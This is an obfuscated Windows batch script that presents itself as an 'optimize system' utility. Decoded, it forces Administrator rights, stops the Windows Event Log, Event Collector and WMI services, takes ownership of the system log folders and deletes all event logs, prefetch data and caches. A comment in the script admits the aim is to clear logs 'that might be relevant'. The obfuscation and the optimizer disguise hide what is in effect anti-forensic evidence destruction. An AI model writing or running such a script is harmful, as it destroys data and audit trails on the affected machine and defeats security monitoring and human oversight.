::obfuscated by https://github.com/fuck baby
@%oNRWCffklV%e%Medb%c%UAHheENDAV%h%TZcVL%o%JoxJNdm% %huJhvw%o%kBr%f%jNDFZoT%f%vLrTacekA%
s%GCK%e%xkv%t%pRUG%l%Wvv%o%ix%c%WBjC%a%JRzjnZL%l%ZtCdc% %pTvNWjky%E%LPww%n%oXIB%a%qf%b%sjdXvZLfrS%l%HodG%e%PICA%D%Z%e%WWqJySHRDR%l%R%a%sO%y%iI%e%LmtgAKoWHm%d%IuPlYitXx%E%WTw%x%G%p%Vukp%a%reCXLpCBb%n%nejU%s%xNn%i%VWV%o%QoUo%n%jinDTAasWM%

t%tRzSNXih%i%nELTx%t%gvfuNLx%l%dqMfgvoE%e%Lu% %jKQi%H%Je%D%MTpppxjKyw%N%AGBcCVws% %h%N%uHWgAM%e%JOFDb%u%Bi%r%iWYrnpFkNs%o%YgBQzt%h%Ev%o%PZQDYTSUTF%s%TU%t%e% %zyaYmsHCgQ%M%BLdebfQJss%o%oglxjiyfk%d%qg%u%JAFIzlC%l%Q%e%atNi% %kuvTI%-%v% %eCKiCayA%C%mkD%l%DetniVj%e%GvxfZ%a%YFuzlq%r%vzj% %gAt%L%cgvxFkT%o%YUEyR%g%UpC%s%zSzAWrK% %SVTGgQvih%a%nyTDkkA%n%uIeubgviTD%d%zTOHLPCrt% %NnlPgOAgH%O%uD%p%V%t%TfVBn%i%vxFqIfW%m%BBt%i%ZBH%z%OVQDigen%e%OY% %KOY%S%aBBlruhNB%y%SfrVCJaoq%s%UxrCujCKy%t%wb%e%msli%m%DQ%
c%zdv%l%N%s%cQEtCk%

:: Copyright and Info
:%z%:%OX% %YTzaqnQA%C%Lo%o%JQSmPJKERr%p%nBmxzA%y%zi%r%vUB%i%tTii%g%xo%h%sTvbEfl%t%wjmnV% %MV%a%UTZgOOrlC%n%e%d%CAnkSfTUkU% %VVqekdUcdy%I%niMz%n%QuysEL%f%j%o%XcnrUWeagC%
e%jt%c%Xo%h%wsyUT%o%TwDTPtdQJ% %WJesdo%=%kwljBJj%=%myJ%=%er%=%G%=%KYWmmUNqDG%=%ijKBABf%=%aCGDrO%=%DSWRp%=%gmOGmrggdJ%=%VT%=%tp%=%kN%=%wcNBI%=%wvHrTEW%=%hqva%=%Hp%=%WlH%=%FymUfguN%=%K%=%jLpy%=%LGnUF%=%b%=%o%=%lnSr%=%nh%=%fWnsC%=%XtEu%=%wiUhUAmdfa%=%jsTXsP%=%nJuiDE%=%GeuwBSJE%=%iq%
e%tYXuRKTQ%c%kFNPUjw%h%Y%o%bsekVzSsbI% %EDJl% %AdNQS% %BosJjpfl% %ClNvLPo% %iCgmsqWOH% %ZW%H%RYlGiKv%D%usHu%N%tPoIpMqg% %vgecUfl%R%D%a%YEi%h%OeEjDkDhY%u%ca%l%pPuf% %yTpIytGaNe%N%pYPSflqZ%e%D%u%v%r%i%o%JqqOXef%h%vV%o%ih%s%Cupd%t%sRvUOnT% %IY%M%OfT%o%NGcyL%d%LlmHERgh%u%nrmBq%l%kLAZm%e%UTfgJVh%
e%G%c%WRByt%h%xTQHIvTLwS%o%XTGpb% %XDIujVtFep%=%svNJIRIIC%=%CHBC%=%x%=%RcqbwWHQWa%=%TOHelN%=%Xtgc%=%C%=%nEgklI%=%L%=%x%=%nhnlMR%=%kW%=%Yf%=%hsj%=%dTSJFE%=%SXwV%=%knXkxlfuF%=%LuQJlwzKiW%=%mdzmGTkHv%=%tQrY%=%ZfkeG%=%CEFSk%=%lEk%=%ZxTYFLjpLI%=%ENRNNMLdA%=%Wk%=%YINK%=%VcSUt%=%DJ%=%W%=%uXPWqE%=%RC%
e%T%c%NAfk%h%EifzOrqVwX%o%GIKvGtOGpJ% %nSc%C%TZbdDp%o%gR%p%qmSjafy%y%NYyRe%r%L%i%CUTJB%g%PoDCDBQhk%h%XUA%t%mecXb% %OjrHYk%(%gXbiuzsvLO%c%XAx%)%gxduKiEAe% %sY%2%BX%0%eBQvbudl%2%SiWKOtvJ%5%OUlgh% %rks%R%tEK%a%epHNRHsaj%h%HgqXAAUWrS%u%ntE%l%gVWmcR%.%WwI% %D%A%sxl%l%rhqcwyH%l%rUsFtJTci% %zOMFWTtgCn%R%PZdwmCiysg%i%DShngF%g%TBRbgJI%h%TIx%t%rVzXT%s%QlNwdk% %dqJW%R%vN%e%YiqKihs%s%RY%e%L%r%komN%v%aXY%e%mSirjZSaBZ%d%AhPiZd%.%MuaScS%
e%ndgf%c%IPQqDhLJpR%h%rLWDhaOyD%o%cP% %asrWlq%M%QMXnwda%a%UFSRg%d%ZehYBkWuH%e%QC% %VGN%b%K%y%yNt% %eV%R%HcBMz%a%UEXIVSIxSc%h%UJMpquEPRl%u%WWMmHXFBN%l%UaG%.%docatpp%
e%KtMKUj%c%ZmptCK%h%Em%o%YBwqpDmL% %IPpkfqU%=%vJAm%=%sxVYhK%=%ldPTdjY%=%evKZkm%=%dNMtb%=%Nj%=%Kvodlwkw%=%aHik%=%PQnwuXRd%=%kiogPLMe%=%JKQQPG%=%RuYLuUMDS%=%s%=%PVQOwkzQ%=%MgYep%=%PmtBkG%=%MoEwpNTRQl%=%HXm%=%GD%=%XZPsR%=%ywtOmQhXZE%=%P%=%IoZ%=%uIkup%=%uusMJZflrO%=%SP%=%MwVsGCn%=%U%=%fBfaCo%=%lN%=%djS%=%h%
e%kHc%c%gtx%h%vK%o%YqHOvd% %uJATGpgiWt%P%cIaEkS%l%EFJb%e%EqSpw%a%CJNqeiJ%s%fSJsPb%e%Z% %Plb%r%zyK%e%NBYQliE%a%XxKnZyNL%d%LrYKCp% %qXvee%t%HIrYPm%h%EUMKI%e%jOp% %wQPpJvM%i%U%n%DTeU%s%wJeh%t%KYly%r%FQFGld%u%zlqHUm%c%ixRhMSiLAG%t%pkMnsicW%i%Zqyk%o%OiLWJlRf%n%UavCBkWlX%s%pE% %uNolr%c%dDJ%a%rCOul%r%Z%e%z%f%SMzsdCzhI%u%Pg%l%WdnJmJt%l%dkVBmUeWs%y%sVr% %KTDdcAeKbt%b%ZzjbGTMV%e%tNi%f%rf%o%lRQbrWHSC%r%bMP%e%eVfJeMuv% %dEzxcSq%p%RByvNlFqvC%r%HOZTYkPCD%o%tEVvi%c%fN%e%kJwkltp%e%itxGXEDNym%d%aEKeiUz%i%KOnGRHkrgZ%n%gnXymHfWC%g%NCUlh%.%PNNBGiYF%
e%dTv%c%rUZ%h%G%o%VyJRQPiTOT% %PMwc%=%FIo%=%SnzfVSXlt%=%A%=%JN%=%LB%=%pc%=%JrCQulvNS%=%yZ%=%pJMmg%=%w%=%KFKqiGMK%=%USW%=%sDlW%=%FZDwVkj%=%aLVmmrHu%=%rFbCZPuXwV%=%tMtOSwJbs%=%xYv%=%MCxtqmg%=%GCFhjBtVv%=%Kz%=%lwOWHA%=%NFOiHPJia%=%Pg%=%JNoReBu%=%ZnM%=%fGiaSGe%=%ks%=%kF%=%kItmGrcyD%=%dMNo%=%QeBjVs%
p%buRv%a%vFGCD%u%FCmgnQVGl%s%Uqf%e%UmjNf%

:: Ensure script runs as Administrator
:%E%:%OSRRBwbU% %qwoO%E%ZnDqcywGXM%n%EBYW%s%ZUsr%u%uxKFdoy%r%VY%e%AuhTsnj% %opZGMcv%s%vKlEgnyS%c%iMBSfLQlt%r%XCV%i%SuFs%p%BsOs%t%hRE% %gflk%r%PKSUse%u%jRx%n%t%s%ppb% %cDO%a%K%s%kL% %qnjaMeE%A%cgeNAr%d%lJYctjVAKZ%m%NXiXCQLm%i%KR%n%XyRiyP%i%hsSZ%s%UYMtwJn%t%dLpJHCiUk%r%jBOGhZGom%a%KCeWcQkVDt%t%ZgfRDmzXmg%o%n%r%vBLQSKFj%
N%oUKGk%E%MRHdfAFdvq%T%ZXrRJAu% %lq%S%rPDgo%E%OqiG%S%cSDOlHjYKs%S%b%I%liyvpRRgMg%O%LCM%N%WAAMk% %kDIZC%>%qOonU%n%Pj%u%oksVMBK%l%snD% %SiQBPXxU%2%nvY%>%PRGs%&%uKoSE%1%pJDc%
I%Gz%F%VVX% %ZfAMrnQtBg%%ERRORLEVEL% %S%N%cvaZyyycrl%E%MDxZGYW%Q%jVSLIF% %tdpzW%0%IfTMbbb% %yExCGWZmuo%(%RhI%
 %UoHc% %iX% %CJG% %fQSs%e%nlSFHkOpY%c%r%h%g%o%m% %LHAWnpbUU%P%g%l%LgDsrSfTV%e%xaFJw%a%wIvgEd%s%AGAAUZx%e%qgxKnOXaun% %cSPi%r%TZu%u%CTEeC%n%FizBQHEso% %phVs%t%zdLk%h%JhIqFTuWn%i%jeLYSSt%s%pmeFE% %MmMuOZrLz%s%ZCBT%c%sCNQscU%r%PJd%i%gcxwfnsmL%p%Zjzet%t%NcCDnZz% %GkgowyGnV%a%ao%s%Rx% %coI%A%yXVSmkP%d%ScAHQDMC%m%m%i%Fk%n%htAf%i%BwhHvEoaR%s%JJUnSgi%t%uRqaDVZnH%r%NLp%a%BalXxnPdMk%t%pxkYOUK%o%Ig%r%uJwkQS%!%QICX%
 %TBBQMU% %oZZlvOIxrn% %nw% %BlUd%p%CeRhgIHL%a%AamHCZFwm%u%bgIdG%s%vc%e%cnAAsM%
 %mLBplxDc% %NTVNeiXl% %LtbyjJi% %DlezfkbAc%e%m%x%AWNNBtiI%i%DKBOTb%t%dVrHFjh%
)%oFoiRG%

e%kCB%c%yuOdtwtk%h%xqQXKoMz%o%CwRxn% %HH%S%mjJ%t%nRLbQY%o%VGKVJAReod%p%mJ%p%YPP%i%NT%n%nM%g%sMyCt% %uMEBn%W%mBBKRiIgPT%i%Syb%n%O%d%iUbb%o%zzOBQSkWXV%w%CmMaSido%s%CUjlp% %SIrGPyl%L%qjvW%o%mHyEVhGmR%g%pZWS%g%xw%i%bo%n%rVl%g%jwtA% %Jskmiee%S%i%e%XuIIeNrky%r%g%v%cjfLPwb%i%ete%c%n%e%Ftjvty%s%HsDYnzX%.%Eud%.%dD%.%YU%
n%JVPl%e%lfsSPPbYtr%t%nATDoES% %IcMg%s%BBjqnkMn%t%oHRoqVPYpO%o%cnaPjIJoS%p%qjztUihcV% %Gg%"%SACdCPX%E%q%v%up%e%ZtkrLof%n%PktlNDilDv%t%ourS%L%mqKLVno%o%mSKKUGGNz%g%KOYXUNMzsx%"%DncjFOg% %GjxYmBmcEV%/%g%y%pITnny% %yKmXPypxx%>%HXTSXmQDzb%n%lBsfenFxtr%u%qiCIaCFrLT%l%yjKXjoig% %diiQmu%2%shB%>%HEKbnnEcg%&%qgmQZMb%1%NstmI%
n%qhZvxqTPCp%e%aiRBhbVeMN%t%UvtkOO% %MnwicPPgGf%s%bZtblPKrY%t%tAiK%o%eGFVZcdeRI%p%CaGQxC% %OVmoDco%"%Yktsn%W%MKrR%e%bZSZrTKEd%c%yyuDYr%s%O%v%KTnI%c%BPKvwVpH%"%ht% %LerhugJhk%/%hIZlx%y%GgG% %DBu%>%sqChH%n%DhWIMPQ%u%EHISZ%l%UyjFWrF% %pKkrSlBYix%2%YSMEfDQM%>%IyGGnmL%&%aGe%1%LH%
n%eXokWUwp%e%JlMP%t%ojEk% %UWpvGqUETq%s%cFx%t%HnhBg%o%TVZWSsdiJI%p%jzzS% %RrQ%"%DVRHkHDSeL%W%EBuQJ%i%dOMDblYC%n%DFYjFdl%m%vhaHVDJ%g%nGNSpUNXYD%m%zdkc%t%HmQK%"%xdelDmL% %kyDAfU%/%XMMbhgn%y%jm% %rsJVV%>%xKt%n%yBgDFAyRCy%u%NQhWIgbDX%l%YR% %PNu%2%sIv%>%NGZb%&%squ%1%AaJoMdGyD%

e%x%c%pzODLzv%h%GqvwgANGQ%o%yqnPxUcdf% %lqv%T%qOdJ%a%sWg%k%zbNPAkCjr%i%YDD%n%qQuxTI%g%qV% %RzJrnab%O%oDeBgeps%w%bYBpp%n%Zai%e%BVVdKmnItu%r%hr%s%rFeLOUcWf%h%dfRa%i%qbBLu%p%zT% %jzQTKgNs%o%lxMPKhxG%f%YfrHSyJ% %kzoC%L%xiflcrW%o%hITyRp%g%VTB% %Fl%F%Lh%i%KCfF%l%AYqOUXeU%e%QXkRv%s%YNqrtlf%.%cqYFT%.%hzSCV%.%RgfLzXX%
t%MHqHR%a%UJBOnwHkAD%k%uOnUedV%e%lLDCdhzq%o%quqHXUp%w%InKH%n%uDIuTqE% %ZnYb%/%Atv%f%oAItpfJf% %Wfy%"%HQrLkMeWCS%%WinDir%\%dBzHUy%L%Aoi%o%OsEEN%g%fD%s%xDOZIJcxO%"%ozmAklKtG% %oLBjOi%/%yVYsovLtR%r%ayuU% %k%/%PkilEE%d%OjwkGUCJ% %akI%y%U% %mXvSfsLdff%>%alNngV%n%TFfGW%u%YJVzXtzi%l%B% %BUCoZjXb%2%Aiw%>%PNXkDLhf%&%gRxCIoELXx%1%JVHqgSxUJ%
icacls "%WinDir%\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%RQkvvMbht%c%vy%a%nEMYGcYf%c%yeZOdF%l%B%s%y% %wThR%"%wAY%%WinDir%\%s%L%ZVf%o%PQCCWXV%g%QgqvZWpy%s%y%"%tnuf% %PgQ%/%BKcMYXZMv%g%mVvJa%r%fRGETEUJ%a%YgsjaCwG%n%LQX%t%kd% %PniNMDVdEE%A%PdxsgVla%d%GQJUMbfLdx%m%JwNbviV%i%Pd%n%YFEsL%i%toLBzP%s%pvQ%t%s%r%H%a%eObGeTWz%t%YbqM%o%XOxGn%r%QwwWA%s%A%:%wPKDwfyNF%F%QXpaRmYXv% %iDATskKS%/%jvWhug%t%dBLXGzV% %mCpVc%/%XSFt%c%FUuOPZCgHj% %kQLZDOthUT%/%qJOZ%q%qaZeP% %TlOdYl%>%zk%n%GwZ%u%TUoji%l%W% %MbiyOtjZBD%2%OjuyAmqYZr%>%duMFDp%&%lNgb%1%zoSXDthK%
t%NdzR%a%nCocj%k%lNY%e%kLZfQz%o%I%w%XTP%n%P% %OZPFVG%/%VEaJiVFWxb%f%ErTMyyzUJU% %VuNvefS%"%Jl%%SystemRoot%\%RdBB%S%lQPPmpF%y%qALpeEh%s%qcssRwc%t%ShxUbzee%e%zDdygsv%m%Ou%3%Fp%2%PkbB%\%RMkB%w%XrXKyeuV%i%rBc%n%beXiYUKPn%e%NxJIyHw%v%z%t%NCzVfRuKYg%\%LYZkWx%L%vYPruiH%o%LySHKGgj%g%k%s%AUFWcgi%"%KxD% %PSD%/%qN%r%d% %s%/%taF%d%wj% %HssHXvuatP%y%l% %NBX%>%XspnBLo%n%QzScVib%u%pg%l%aLvni% %TSid%2%GPjjfZKRI%>%Anv%&%XEYemeWdr%1%LfDgydbxrF%
icacls "%SystemRoot%\System32\winevt\Logs" /grant Administrators:F /t /c /q >nul 2>&1
i%fpiMsXhq%c%clDWUZVnM%a%qYaZNfwmu%c%Xvlf%l%PujyBrpJg%s%CD% %c%"%yQbDHv%%SystemRoot%\%bSexJ%S%pSQ%y%EysoIRHSzV%s%bjz%t%RS%e%CRTmvEF%m%Cf%3%nrrQ%2%hDDlbin%\%cuAxNpGfD%w%Wz%i%EJnn%n%ZGWelKr%e%KxSdfTczf%v%cyMiYUxq%t%YWuGrSij%\%cMrGmmD%L%MzOlxnorWs%o%GPDVYPsJB%g%BlH%s%ImHzTFJIjg%"%rsqoWJjZP% %BKLNvj%/%UPST%g%YybnwF%r%NdzrtsS%a%RuoJCxPqF%n%rzWaZ%t%gMuID% %Eb%A%I%d%qk%m%SZmtQW%i%F%n%lavbtyrk%i%RWFRw%s%wRRUdLUtSK%t%xC%r%kPjpBH%a%RBQTsxkWj%t%r%o%jPb%r%GEPKU%s%idvxUxM%:%sbe%F%zrntDeuCHa% %zBeg%/%KhYEhoPRk%t%aDgvkHu% %IVFSjPD%/%mrKO%c%xVkBQlLmNp% %tPDRjLoBIp%/%UVZpaIA%q%RKTITzH% %j%>%ykqZzZNZl%n%xqbXzPQN%u%bJrLE%l%xjR% %ZgiT%2%Pn%>%tbAh%&%NFfy%1%mamgTbFtq%

e%ELypdmZu%c%CkuIQKh%h%QXSVkP%o%BeCs% %crgifRBlo%D%tCXEdQHbWO%e%SvQePgj%l%GowcwUIR%e%eQ%t%Vvgoo%i%dunxZ%n%spImErjmTz%g%JYNTEQMgw% %ZOTTRb%A%CvuHwf%L%zOthp%L%M% %UDkzTrTba%L%tExcOhFEnS%o%umoKqQZm%g%vbXRywmZR%s%LuBdDKI% %zuRFZk%(%w%T%JHFekbKXT%h%umyVZp%i%eLkkoPw%s%KIpxJiHYqs% %lT%i%rGXfvaC%s%JiQ% %gH%a%Dv% %QiDbppAcnE%p%uYvXwpAzb%r%thHmDoca%e%mUVpwGP%-%udI%s%FtUD%t%YGqBSxlc%e%WbvXxsF%p%LbJKGKCO%,%PE% %VnPlmkBv%c%Syjoa%l%HKPRavP%e%KV%a%eumVNdRfb%n%g%u%wEKxq%p%rayqmaH% %Frm%a%kHApSQNt%f%Px%t%WHO%e%MfzJElvif%r%FMRItCzy% %VZs%p%F%r%DvfEZIImpS%o%ie%c%G%e%Juy%s%luMFpBBmBA%s%I% %OQMjcG%w%ICvHXWb%i%CfzJjNwXdo%l%EpVSUGJK%l%jkQdTpCcLE% %dLplZL%h%TYwwhA%a%LMFbDZI%p%GkHDGtg%p%VWOAYaBYM%e%YyWyUFuA%n%RfsFo% %qafNKMso%l%BkNHP%a%TghaAuZ%t%CZlmrE%e%GRkfjWdpuQ%r%OgIeIicrpC%)%CKV%.%Yf%.%FqlCpSYDXJ%.%U%
:: Deleting logs (temporary, to clear any existing logs that might be relevant before starting the optimization process)
:%miV%:%B% %cTiKQUp%D%sBy%e%oKEkuzz%l%F%e%lWegRvZEHQ%t%JPXXSnrfS%i%fYuwrTo%n%fdWye%g%QbNnDz% %cGNg%l%zJG%o%xAf%g%hQLof%s%ISi% %VKPRQPPA%(%wu%t%AE%e%rPRciaN%m%aSxOW%p%votI%o%f%r%iDAMHGYk%a%xwdFtp%r%yS%y%PRcoGxnU%,%lNJExOhH% %f%t%yjADlWZLKx%o%xaJ% %y%c%TXbyAARUFz%l%VqAK%e%QjEiVt%a%cgZAbbJJ%r%TOa% %PSWbTktb%a%fsqamoaVa%n%V%y%jK% %sAkviAt%e%fzW%x%qCUSSab%i%mZu%s%NvUdLIhz%t%rK%i%T%n%xFWkId%g%n% %BxFQ%l%RrjanTWXkJ%o%MoQLV%g%LvI%s%sWqQRjHKij% %yqHKiTRo%t%URfIRBSAHA%h%zJMtBerv%a%vSyuAA%t%uWtMH% %tebxtbnEjD%m%vZ%i%eaVb%g%Ph%h%zZHo%t%qjQTJXYj% %hmemTu%b%FdyE%e%Q% %tmeaZQCZvP%r%Q%e%hsRupmJ%l%EGDaK%e%nJHLwipq%v%NxLoyKO%a%wbAHgzn%n%SOldneCHLW%t%sMS% %gy%b%EQBdF%e%vL%f%OKuZ%o%asIIOuo%r%otq%e%BTXDFLR% %WTzN%s%VuoKO%t%oTKavGt%a%sweokls%r%is%t%rhipJtVqq%i%IyaRTrcu%n%iwfwjRUZmj%g%EiN% %v%t%Ukhf%h%aPdXxmPz%e%GwhUcBG% %EmAizvIQV%o%JrnrvCmH%p%VaulbFXPSN%t%pBiqOtVlfN%i%crytQsfVC%m%CDwhLW%i%wkKvMu%z%YAXBzupjTF%a%TmxR%t%QeZe%i%ukY%o%m%n%Ijy% %Fo%p%mJv%r%ohlg%o%KZAm%c%ghKXbQy%e%yqV%s%bRrbwDIOS%s%olZYV%)%VaSWrgF%
d%XB%e%j%l%RPmBqbGi% %bO%/%JNOMWnBe%s%cAnZ% %lugWjPHdgP%/%Vdj%f%UBEm% %GysYW%/%AeXvo%q%VyRu% %yMfjiJNlGt%"%ymxzQ%%WinDir%\%NEYS%L%skMloK%o%Dbrgykf%g%PUCep%s%SEmQFxViKl%\%ndLya%*%bO%"%I% %gBB%>%VQtvmNBGul%n%XdXRVmeerE%u%dxhtfsSIeQ%l%dqJdlDDRJ% %kEvyboIg%2%twyxlI%>%dlXAx%&%kVYdlJU%1%LxlQXCnJg%
d%DaKtJ%e%p%l%teoKeFv% %dMlzEH%/%zUOwSP%s%WeXBijjIL% %zn%/%KYkQdS%f%yehXi% %FisLrXUaqt%/%ut%q%t% %LG%"%gNzrZKC%%SystemRoot%\%BTHXBvMY%S%ABZ%y%xIERWTdFZK%s%DSDgZCjf%t%fL%e%aTiqBajT%m%DfdDhT%3%uyKZuhF%2%pPZB%\%aeo%w%LqY%i%pDjEDClrjA%n%pxsArGym%e%DECAm%v%PRPVaUKt%t%byJVifpsh%\%JsnEYynTbd%L%tKxnzguF%o%aZU%g%cHaGbIHkZ%s%IwvKdk%\%dIe%*%nosyyK%"%W% %AjYwpjxjd%>%APQfhUt%n%zjax%u%oe%l%vMKnebMiK% %OmX%2%hhleOXo%>%b%&%UGoef%1%kKovbyxg%
d%HHHNPa%e%swCfEFca%l%fgX% %kyejW%/%b%s%lF% %Fm%/%usNf%f%asAo% %OA%/%MfneOhNOt%q%ZB% %Rem%"%bGMkFh%%LocalAppData%\%qnnowItqT%T%gNShVcjrIr%e%JDVZdeowWO%m%wommAxok%p%gmNP%\%XrpnfpIe%*%O%"%L% %HakNIvgM%>%mGOUpwYm%n%eYKKkgz%u%GYVwJijT%l%wBJkJwETzy% %p%2%VTEeuliNqc%>%cFZxIveWtM%&%StqZLRnyc%1%gKwDF%
d%nyS%e%a%l%SxOJMU% %PugbD%/%hxsZf%s%MoOCETtedc% %DDkQqkA%/%wSX%f%edxTMye% %wsdHLePBmJ%/%inm%q%fTlADmN% %oZfCX%"%sfbgNB%%Temp%\%S%*%PBi%"%x% %Qc%>%zUaphoFTY%n%QnvBh%u%B%l%kcuqADlxsH% %eIokkLR%2%lYLyvMs%>%mrtrIApJ%&%S%1%pp%
d%wcbQZwMos%e%R%l%oIZiDPQcM% %MXdcpfe%/%rrkXWWnU%s%Ip% %R%/%RkZxLTDL%f%kpjOvj% %i%/%Gvq%q%kfw% %nwGRGl%"%FrA%%WinDir%\%LZvMgO%T%OPGDMyyl%e%L%m%suPJGputjK%p%ZcllfC%\%DERKaJBO%*%S%"%sgoBysrVZ% %tIDyXwgI%>%ZyIBoqhvw%n%TccOKYzpfz%u%a%l%tbE% %NmAUErpF%2%X%>%AzldjdTqKW%&%dnBWKxkY%1%N%
d%exwJV%e%KDPHRnpQ%l%Qxmnlezn% %oIwQ%/%LfF%s%buXG% %yiK%/%Tr%f%RQPOsMZBDi% %ep%/%CBZGlOXJ%q%fvMdz% %caANNgl%"%Y%%SystemRoot%\%sHVeoDtn%P%ZGwx%r%tlFqN%e%zbOMXvWx%f%pHPf%e%LhwGDU%t%u%c%eZ%h%unpJ%\%J%*%berNz%"%AMZ% %KVdNIq%>%YzcEcps%n%AjBdq%u%CIWuzL%l%CMux% %q%2%bU%>%nLJWp%&%AXGeYRcpnz%1%EuaxBBBcD%
d%gESz%e%eZxiP%l%DIpRCIhwSG% %jdR%/%SBiFkpc%s%NmGlZ% %pjs%/%j%f%xSRNL% %VDBfCd%/%jzgHcJZ%q%BP% %ptbfwOSS%"%thILJIotRP%%LocalAppData%\%YxDclUeTI%M%vC%i%TLsMLvzVpu%c%qX%r%nzNpH%o%LIu%s%l%o%EmSRu%f%ZkIy%t%BNfDTY%\%SyLGEW%W%oAfJ%i%H%n%UAWZ%d%gyFIl%o%JBbU%w%GaSvQEKX%s%iIXX%\%JJFArOIXW%I%vfiZrd%N%FAslqb%e%FmqqOmk%t%uPjFUCPLw%C%wvoGXytmC%a%i%c%My%h%ZcXHjKLHT%e%d%\%uEVULxSbA%*%tBWXp%"%LKP% %nTLJuyD%>%lXVkJLPhH%n%im%u%EYV%l%dAII% %QHpCvVlFkE%2%lkhKjbDFm%>%xyejWx%&%UqkZqedD%1%tnV%

:: Main Menu
:%oRDEJbL%:%BnHlxi% %CLDPNqpgk%M%JwHremhPM%a%lYEfRZho%i%WWYvM%n%yV% %wvHoxxga%M%kraFWowDBE%e%w%n%PItmbKip%u%uLfBoVPzD%
c%RUsVe%l%uCsDkVd%s%mo%
e%oPDYzLUWd%c%xckpV%h%FyBM%o%aotCidAqyK% %Fg%=%FPeEkJ%=%OTOUCiODY%=%e%=%pfFmUQ%=%Auim%=%qXocJ%=%Omw%=%ZK%=%P%=%B%=%jFe%=%PRs%=%Hd%=%HFVsIWHdi%=%kUixvs%=%Wvbi%=%llUSirH%=%lNqkjcO%=%rKiMM%=%YXNzpWNaeC%=%PtTAeYtLl%=%jTJTCDFYAl%=%cbzx%=%h%=%nDIczSvODa%=%aoNdaf%=%Tk%=%nJGgE%=%RwDtwN%=%tMfIElUB%=%AyOdhCy%=%giHJ%
e%soM%c%rEecCHVRR%h%LKQIJdnqBo%o%RaK% %T% %SfPZFFx% %naDp% %H% %cTIhEk% %vXJfPwX% %kgvFvYklFZ%H%hJmsOfIlux%D%fcVHJsAl%N%Qx% %h%N%RnkZsm%e%ZUnyE%u%zrn%r%WntLF%o%IuYJtIjZ%h%xFheL%o%PQuiYbG%s%Vy%t%VMTkq% %ob%M%UEm%o%AEZdJ%d%eV%u%uHIsbRvizU%l%tSp%e%nLsD%
e%N%c%Rpss%h%QEJzS%o%XO% %aAQMt%=%Xs%=%yJ%=%hzskE%=%MdQjjnbsF%=%vDEp%=%foHfj%=%uognJz%=%BCtYDrMf%=%JYHMy%=%GXTom%=%awC%=%ViNxndXvY%=%H%=%eCqhyEb%=%KRpkUt%=%DosxWIuEX%=%TDKLQ%=%QsbRMNgOo%=%OVW%=%BrhwyiUMy%=%uksSFCVSo%=%Z%=%Mx%=%eXnBhiGmq%=%cmVsWvA%=%sPTRCApY%=%oCJnk%=%jFvUoMsZj%=%wRr%=%agB%=%yh%=%IgDezp%
echo WARNING: Optimization process will now apply critical system-level changes!
e%K%c%dvEHoM%h%JGw%o%iSAiPTStb% %A%W%kowRZSWgJ%A%npSmGk%R%ni%N%QCCq%I%HgPX%N%kaL%G%QX%:%m% %WRUNcBa%O%A%p%KKLOUHdud%t%qrMIkPX%i%gR%m%zwCFSr%i%QtYWn%z%lMKO%a%umwdusToup%t%kROXtpd%i%attAFwUb%o%jA%n%zZfBLuupV% %nAHYYKd%p%mAG%r%fQv%o%LoWgRqE%c%S%e%GILYIxEv%s%YsmLShC%s%DI% %EULNyCPu%w%tQcHgFKTT%i%k%l%RjlYxjQGUI%l%Ea% %bhLGhCGE%n%DEsfJ%o%Fz%w%O% %I%a%HjEPqOHh%p%QlOJKph%p%OY%l%jDDl%y%RiRgTDn% %SdE%c%C%r%JYbWYWUJKv%i%BjPtcwGI%t%asuWkXhX%i%fgcnr%c%mgPUwIRUEK%a%aTACRh%l%h% %wOWmAvCLS%s%vtzIKsNZI%y%RJVlO%s%AFJ%t%orr%e%pvBTrLC%m%JBUDo%-%I%l%hiiD%e%wBPyjlrwWS%v%Yl%e%mH%l%VcM% %EYh%c%l%h%RbVd%a%wnmifRCTN%n%uAtN%g%RmpcQsMIH%e%nilRvhF%s%RoZiDKCK%!%gMqGtoAq%
e%GFUNrvx%c%ERQEFIiID%h%mOYDKg%o%ULgCj% %SMuLnJwsRI%D%qTa%o%KMeIQbEo% %AasfAQ%n%cICz%o%VsWY%t%P% %GHl%i%aGjq%n%QOtn%t%ChRwTzks%e%iN%r%UgnxSAhyDO%r%Zsl%u%thcnuNXCX%p%Ezdz%t%cJw% %swhzcl%t%LgSegtFhE%h%d%e%r% %wOEVFUZmH%p%AHPlys%r%QazvUYJ%o%mIc%c%MVTZgVtRoL%e%RbNmD%s%yZIXEsIV%s%vW%.%aPcoWAX% %QskpQXwlTN%T%oi%h%aA%i%Ayf%s%NjUs% %qGJnvnF%i%PfWZG%s%m% %Q%f%jiKXkcg%o%QCXTmjH%r%SjtcU% %wDSFaWp%o%iC%p%hwDVzsNRgk%t%Uv%i%rHjXqJdjw%m%ijWsgRUcCD%i%APN%z%ZvkI%a%o%t%oFwnvBM%i%hs%o%jLOEvPwVo%n%sveTSOJO% %dxLrrxVcA%p%xHb%u%GAYWJnTYYI%r%HUWRrav%p%P%o%e%s%cMbeSGauu%e%KsFqe%s%mh% %IRCcrCwdic%o%JSp%n%TiW%l%m%y%tUOYiXmEt%.%giWAA%
e%iumgsoZtrK%c%wwLWHvw%h%cD%o%bl% %dY%=%UwmVmiPUns%=%GsaDxI%=%eqBmLKyh%=%RuSsAQNlv%=%W%=%AyTdfuoMvP%=%uPZFix%=%keCmENb%=%VubKTAhJ%=%XTwozo%=%K%=%oPfRwQUWm%=%fX%=%qrIcFTI%=%PKzMZy%=%UiaeT%=%rMsuaj%=%oSKxkgu%=%NzyPg%=%ezH%=%TcIdoELhs%=%SgObZUklrQ%=%sXZ%=%TWGRIMlf%=%Dy%=%pzijhdVfe%=%tACEBXmlP%=%CgqiUtL%=%uCVWSva%=%ZpYqvhLHn%=%VLsmwVtf%=%tvtNAQA%
e%ZQoJ%c%eKgnL%h%LsAu%o%gVaGAurOm% %yyVhKbalF%1%QyhaZ%.%nnwsLNw% %JWdJVYRXZ%A%MpzVt%p%oWr%p%uAfeSMZJfh%l%RHbpubyfw%y%yZUEaIfeQW% %XRmqqaQUZI%O%DJ%p%UUz%t%xoYABvcT%i%SVogr%m%qkpv%i%WLfH%z%Iow%a%GjZiKuiwq%t%fg%i%LXEiLdL%o%m%n%tohXZ% %B%(%iu%C%DONu%r%eawmbTK%i%lDLvrIqXBg%t%OpzuSELCC%i%d%c%wrUNTlrCTI%a%b%l%aGWFhJfYX% %eqAHLuVQ%U%dn%p%XvkNMc%d%WsPNG%a%vKMe%t%E%e%bLguqb%)%VPOcwXX%
